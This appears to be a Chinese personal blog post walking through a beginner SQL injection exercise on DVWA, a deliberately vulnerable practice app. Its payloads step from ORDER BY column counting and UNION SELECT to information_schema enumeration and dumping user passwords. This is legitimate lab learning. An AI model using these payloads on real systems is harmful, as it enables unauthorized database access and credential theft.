<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge" >
  <title>dvwa初级sql注入试炼 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="今天来试炼sql注入
首先对输入框进行注入测试输入 1 ，此时得到下图
我们会发现url中有id=1，页面中会出现firstname 和 surname 两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’ ，此时会报错，再输入1’# 时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：select firstname,surname from [未知表">
<meta property="og:type" content="article">
<meta property="og:title" content="dvwa初级sql注入试炼">
<meta property="og:url" content="http://iyushan.github.io/2016/09/29/dvwa初级sql注入试炼/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="今天来试炼sql注入
首先对输入框进行注入测试输入 1 ，此时得到下图
我们会发现url中有id=1，页面中会出现firstname 和 surname 两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’ ，此时会报错，再输入1’# 时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：select firstname,surname from [未知表">
<meta property="og:image" content="https://cl.ly/1H3q2b2q2i1R/1.jpg">
<meta property="og:image" content="https://cl.ly/0C2x1h0h3f43/2.jpg">
<meta property="og:image" content="https://cl.ly/0N3y3g2s131e/3.jpg">
<meta property="og:image" content="https://cl.ly/2b353z1D342T/4.jpg">
<meta property="og:image" content="https://cl.ly/010U2W3M0M42/5.jpg">
<meta property="og:image" content="https://cl.ly/042a0J3j1i1L/6.jpg">
<meta property="og:image" content="https://cl.ly/3A3v2t3y422r/7.jpg">
<meta property="og:image" content="https://cl.ly/2I0N1y0C3B2d/8.jpg">
<meta property="og:updated_time" content="2016-10-08T02:08:07.305Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="dvwa初级sql注入试炼">
<meta name="twitter:description" content="今天来试炼sql注入
首先对输入框进行注入测试输入 1 ，此时得到下图
我们会发现url中有id=1，页面中会出现firstname 和 surname 两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’ ，此时会报错，再输入1’# 时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：select firstname,surname from [未知表">
<meta name="twitter:image" content="https://cl.ly/1H3q2b2q2i1R/1.jpg">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/favicon.ico">
  
  <script src="/style.js"></script>
  

</head>

<body>
  <div id="container">
    <div class="left-col">
      <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img src="https://cl.ly/472m3a0y1N0L/2.JPG" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/">虞山</a></h1>
		</hgroup>

		
		<p class="header-subtitle">业精于勤荒于嬉 行成于思毁于随</p>
		

		<nav class="header-menu">
			<ul>
			
				<li><a href="/">主页</a></li>
	        
			</ul>
		</nav>
		<nav class="header-smart-menu">
	        
    		
    			
    			<a class="js-smart-menu" data-idx="0" href="javascript:void(0)">所有文章</a>
    			
    			
            
    			
    			<a class="js-smart-menu" data-idx="1" href="javascript:void(0)">关于我</a>
    			
    			
            
		</nav>
		<nav class="header-nav">
			<div class="social">
				
			</div>
		</nav>
	</header>		
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"><i class="icon-list"></i></div>
  		<h1 class="header-author js-mobile-header hide">虞山</h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				
					<img src="https://cl.ly/472m3a0y1N0L/2.JPG" class="js-avatar">
				
			</div>
			<hgroup>
			  <h1 class="header-author">虞山</h1>
			</hgroup>
			
			<p class="header-subtitle">业精于勤荒于嬉 行成于思毁于随</p>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>

      <div class="body-wrap">
        <article id="post-dvwa初级sql注入试炼" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      dvwa初级sql注入试炼
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="今天来试炼sql注入"><a href="#今天来试炼sql注入" class="headerlink" title="今天来试炼sql注入"></a>今天来试炼sql注入</h1><ol>
<li><p>首先对输入框进行注入测试输入 1 ，此时得到下图<br><img src="https://cl.ly/1H3q2b2q2i1R/1.jpg" alt="1"></p>
<h6 id="我们会发现url中有id-1，页面中会出现firstname-和-surname-两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’-，此时会报错，再输入1’-时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：select-firstname-surname-from-未知表名-where-id-‘1’"><a href="#我们会发现url中有id-1，页面中会出现firstname-和-surname-两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’-，此时会报错，再输入1’-时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：select-firstname-surname-from-未知表名-where-id-‘1’" class="headerlink" title="我们会发现url中有id=1，页面中会出现firstname 和 surname 两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’ ，此时会报错，再输入1’# 时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：select firstname,surname from [未知表名] where id =‘1’ ;"></a>我们会发现url中有id=1，页面中会出现firstname 和 surname 两个返回值，现在还要确认是字符型注入还是数字型注入，输入1’ ，此时会报错，再输入1’# 时，返回正确，可以确认是属于字符型注入，此时可以猜想出后台的sql查询语句可能是这样的：<code>select firstname,surname from [未知表名] where id =‘1’</code> ;</h6></li>
<li><p>猜测字段数，输入 <code>1’ order by 1 #</code> ， 返回正确<br><img src="https://cl.ly/0C2x1h0h3f43/2.jpg" alt="2"></p>
</li>
</ol>
<h6 id="输入-1’-order-by-2-，-返回正确，输入-1’-order-by-3-，-返回错误，可以猜测字段数为2"><a href="#输入-1’-order-by-2-，-返回正确，输入-1’-order-by-3-，-返回错误，可以猜测字段数为2" class="headerlink" title="输入 1’ order by 2 # ， 返回正确，输入 1’ order by 3 # ， 返回错误，可以猜测字段数为2."></a>输入 <code>1’ order by 2 #</code> ， 返回正确，输入 <code>1’ order by 3 #</code> ， 返回错误，可以猜测字段数为2.</h6><ol>
<li>设法让后台返回一些信息，输入 <code>1’ union select 1,2 #</code> ，返回正确</li>
</ol>
<p><img src="https://cl.ly/0N3y3g2s131e/3.jpg" alt="3"></p>
<p><code>1&#39; union select database(),user() #</code> //返回db名和用户名</p>
<p><img src="https://cl.ly/2b353z1D342T/4.jpg" alt="4"></p>
<p><code>1&#39; union select version(),@@version_compile_os #</code> //返回db所在系统版本和db版本<br><img src="https://cl.ly/010U2W3M0M42/5.jpg" alt="5"></p>
<ol>
<li>在mysql中有一个特殊的数据库information_schema，就像一个字典，包含本db中所有的表名和列名，数据库中有两个表information_schema.tables和information_schema.columns，可以通过这两个表获取信,构造注入语句：</li>
</ol>
<p>//获取表信息<br><code>1&#39; union select table_name,2 from information_schema.tables where table_schema=&#39;dvwa&#39;#</code><br>PS:dvwa的十六进制是<code>0x64767761</code>，直接将十六进制放到’dvwa’出也可以查询<br><img src="https://cl.ly/042a0J3j1i1L/6.jpg" alt="6"><br>//获取选定表的列信息<br><code>1&#39; union select column_name,2 from information_schema.columns where table_name=&#39;users&#39; and table_schema=&#39;dvwa&#39;#</code><br><img src="https://cl.ly/3A3v2t3y422r/7.jpg" alt="7"></p>
<ol>
<li>获取admin</li>
</ol>
<p><code>1&#39; union select user,password from users #</code><br><img src="https://cl.ly/2I0N1y0C3B2d/8.jpg" alt="8"></p>
<p>Done!</p>
<p>PS:information_schema中还有一个schemata表，存放着mysql中整个数据库的名字，构造代码: 1’union select group_concat(schema_name),2 from information_schema.schemata #<br>//其中group_concat()函数是将schema_name 表的内容整合到一个地方显示，group_concat(字段名,分隔符_Hex,另一个字段名)，可以将两个字段分开，方便查看</p>

      
    </div>
    <div class="article-info article-info-index">
      
      <a href="/2016/09/29/dvwa初级sql注入试炼/" class="archive-article-date">
  	<time datetime="2016-09-29T13:57:46.000Z" itemprop="datePublished"><i class="icon-clock"></i>2016-09-29</time>
</a>
      
      

      <div class="clearfix"></div>
    </div>
  </div>
</article>

  
<nav id="article-nav">
  
    <a href="/2016/09/30/sql注入总结/" id="article-nav-newer" class="article-nav-link-wrap">
      <i class="icon-circle-left"></i>
      <div class="article-nav-title">
        
          sql注入总结
        
      </div>
    </a>
  
  
</nav>




<div class="share_jia">
	<!-- JiaThis Button BEGIN -->
	<div class="jiathis_style">
		<span class="jiathis_txt">Share to: &nbsp; </span>
		<a class="jiathis_button_facebook"></a> 
	    <a class="jiathis_button_twitter"></a>
	    <a class="jiathis_button_plus"></a> 
	    <a class="jiathis_button_tsina"></a>
		<a class="jiathis_button_cqq"></a>
		<a class="jiathis_button_douban"></a>
		<a class="jiathis_button_weixin"></a>
		<a class="jiathis_button_tumblr"></a>
    <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jtico jtico_jiathis" target="_blank"></a>
	</div>
	<script type="text/javascript" src="//v3.jiathis.com/code/jia.js?uid=1405949716054953" charset="utf-8"></script>
	<!-- JiaThis Button END -->
</div>









      </div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
    	<div class="footer-left">
    		&copy; 2016 John Doe
    	</div>
      	<!--
	<div class="footer-right">
      		<a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/litten/hexo-theme-yilia" target="_blank">Yilia</a> by Litten
	</div> -->
    </div>
  </div>
</footer>


    </div>
    <script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: false,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false,
		root: "/"
	}
</script>

<script src="/./main.js"></script>


    
<div class="tools-col">
  <ul class="btn-wrap">
    
      <li class="chose" data-hook="tools-section-all"><span class="text">全部</span><i class="icon-book"></i></li>
    
    
    
    
      <li data-hook="tools-section-me"><span class="text">我</span><i class="icon-smile"></i></li>
    
  </ul>
  <div class="tools-wrap">
    
    	<section class="tools-section tools-section-all chose">
    	</section>
    

    

    

    
    	<section class="tools-section tools-section-me">
  	  	
  	  		<div class="aboutme-wrap" id="js-aboutme">Mr.Liu&lt;br&gt;&lt;br&gt;记录点滴，热爱生命&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;“ 自律给我自由 ”</div>
  	  	
    	</section>
    
  </div>
  
</div>
    <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>
  </div>
</body>
</html>